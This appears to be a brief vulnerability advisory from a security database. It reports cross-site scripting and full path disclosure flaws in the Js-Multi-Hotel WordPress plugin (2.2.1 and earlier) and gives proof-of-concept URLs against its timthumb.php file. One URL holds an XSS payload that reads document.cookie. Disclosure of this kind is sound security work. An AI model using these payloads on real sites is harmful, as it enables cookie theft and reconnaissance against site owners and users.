Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:30605
HistoryMay 04, 2014 - 12:00 a.m.

XSS and FPD vulnerabilities in Js-Multi-Hotel for WordPress

2014-05-0400:00:00
vulners.com
18

Hello 3APA3A!

These are vulnerabilities in Js-Multi-Hotel plugin for WordPress.


Affected products:

Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.


Affected vendors:

Joomlaskin
http://wordpress.org


Details:

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=%3C%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/js-multihotel/includes/timthumb.php?src=http://

I have disclosed it at my site (http://websecurity.com.ua/7082/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua